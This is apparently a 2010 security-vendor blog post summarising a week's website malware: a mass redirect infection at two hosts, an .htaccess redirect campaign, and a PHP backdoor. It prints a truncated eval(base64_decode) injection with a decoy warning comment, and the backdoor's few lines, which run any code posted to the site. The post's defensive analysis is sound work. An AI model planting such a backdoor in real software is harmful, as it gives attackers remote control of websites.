Weekly malware update – 2010/Dec/17

Starting this week, we’re going to begin posting a weekly malware update about the issues (always malware-related ) that arise throughout the week.

This is the first one and you will be able to track those by following our malware_updates category.

*If your site has been affected with any of those issues, contact us at support@sucuri.net or visit http://sucuri.net to get help or if you want to share some information with us.

onlline.info – Dreamhost and 1&1

We detected that many sites hosted at DreamHost and 1and1.com got infected by this domain. In fact, Google blacklisted more than 2000 domains infected by it (all of them at these two companies):

Yes, this site has hosted malicious software over the past 90 days. It infected 2044 domain(s), including lancastersuites.com/, clipdepelicula.com/, mostofmymac.com/.

Many of the sites we analyzed were doing a server-side redirect and didn’t have any malware at all. Some of them had those famous “eval(base64_decode” at the top of every PHP file. One of them was pretty funny:

eval(base64_decode(“aWYoZnVu……b25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=’)); ?><br /> <?php /*Packed BLOB icon data. Corruption may result script execution errors. Don’t touch it unless you know what you are doing.*/

Did you see it there? They added the text “Packed BLOB icon data. Corruption may result script execution errors. Don’t touch it unless you know what you are doing” to see if the person looking for the malware wouldn’t remove it afraid it would break the site.

publifacil.org – PE*.php and .htaccess redirect

This one got many hits as well. We don’t have a solid number because none of the sites infected got blacklisted by Google, but the number was quite high (probably the same as onlline.info – 2k). We did a review of it on this post:

https://blog.sucuri.net/2010/12/malware-update-publifacil-org-htaccess-changes-and-pe-php.html

The main sympton people notice with this malware is that their posts disapear from the wp-admin, while the live site looks ok.

I love you backdoor

Very cute name for a backdoor. We saw that on many of the hacked sites this week. If you understand PHP that is enough to see what it does:

if($_GET[‘testorrr’]==’1′){ echo ‘i love you’; exit; }<br /> if(isset($_POST[‘love’])){<br /> eval($_POST[‘love’]);<br /> exit;

That’s it for this week. If you have any questions, let us know.